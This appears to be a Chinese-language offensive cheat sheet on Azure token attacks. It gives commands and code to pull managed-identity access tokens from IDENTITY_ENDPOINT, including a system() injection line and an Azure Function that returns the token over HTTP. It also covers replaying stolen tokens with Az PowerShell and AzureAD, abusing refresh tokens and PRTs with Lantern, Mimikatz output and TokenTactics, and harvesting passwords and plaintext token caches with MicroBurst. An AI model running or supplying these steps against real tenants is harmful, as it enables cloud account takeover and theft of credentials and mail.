令牌
来自托管身份的令牌
MSI_ENDPOINT是IDENTITY_ENDPOINT的别名,MSI_SECRET是IDENTITY_HEADER的别名。
从环境中找到 IDENTITY_HEADER 和 IDENTITY_ENDPOINT :env
大多数情况下,您需要以下资源之一的令牌:
https://storage.azure.com
https://vault.azure.net
https://graph.microsoft.com
https://management.azure.com
通过 Powershell 的 Azure API
从IDENTITY_HEADER和IDENTITY_ENDPOINT获取access_token : 。system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
然后查询 Azure REST API 以获取订阅 ID等。
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
列出资源并检查 runCommand 权限
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
通过 Python 版本的 Azure API
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
或在 Python 函数中
import logging, os
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
获得令牌
主刷新令牌的有效期为 14 天!
az cli
az account get-access-token
az account get-access-token --resource-type aad-graph
或者Az
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
或从使用 IDENTITY_HEADER 和 IDENTITY_ENDPOINT 的托管标识
使用令牌
令牌包含所有声明,包括 MFA 和条件访问的声明
AZ Powershell
PS C:\Tools> $token = 'eyJ0e..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId <ACCOUNT-ID>
# Access Token and Graph Token
PS C:\Tools> $token = 'eyJ0eX..'
PS C:\Tools> $graphaccesstoken = 'eyJ0eX..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
PS C:\Tools> Get-AzResource
ERROR: 'this.Client.SubscriptionId' cannot be null.
托管标识对任何 Azure 资源都没有权限。 切换到 GraphAPI
AzureAD
Import-Module C:\Tools\AzureAD\AzureAD.psd1
$AADToken = 'eyJ0…'
Connect-AzureAD -AadAccessToken $AADToken -TenantId <TENANT-ID> -AccountId <ACCOUNT-ID>
刷新令牌
https://github.com/ConstantinT/Lantern
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password )
https://github.com/rvrsh3ll/TokenTactics
Import-Module .\TokenTactics.psd1
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Token 0.0.1 TokenTactics
Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics
Function Forge-UserAgent 0.0.1 TokenTactics
Function Get-AzureToken 0.0.1 TokenTactics
Function Get-TenantID 0.0.1 TokenTactics
Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics
Function Parse-JWTtoken 0.0.1 TokenTactics
Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics
Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics
Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics
Function RefreshTo-GraphToken 0.0.1 TokenTactics
Function RefreshTo-MAMToken 0.0.1 TokenTactics
Function RefreshTo-MSGraphToken 0.0.1 TokenTactics
Function RefreshTo-MSManageToken 0.0.1 TokenTactics
Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics
Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics
Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics
Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics
Function RefreshTo-OutlookToken 0.0.1 TokenTactics
Function RefreshTo-SubstrateToken 0.0.1 TokenTactics
窃取令牌
获取 AzurePasswords
>Import-Module Microburst.psm1
>Get-AzurePasswords
>Get-AzurePasswords -Verbose | Out-GridView
从 az cli 窃取令牌
az cli 将访问令牌以明文形式存储在目录中的accessTokens.json中C:\Users\<username>\.Azure
同一目录中的 azureProfile.json 包含有关订阅的信息。
从 az powershell 窃取令牌
Az PowerShell 将访问令牌以明文形式存储在目录中的TokenCache.dat中C:\Users\<username>\.Azure
它还在AzureRmContext.json中以明文形式存储ServicePrincipalSecret
用户可以使用保存令牌Save-AzContext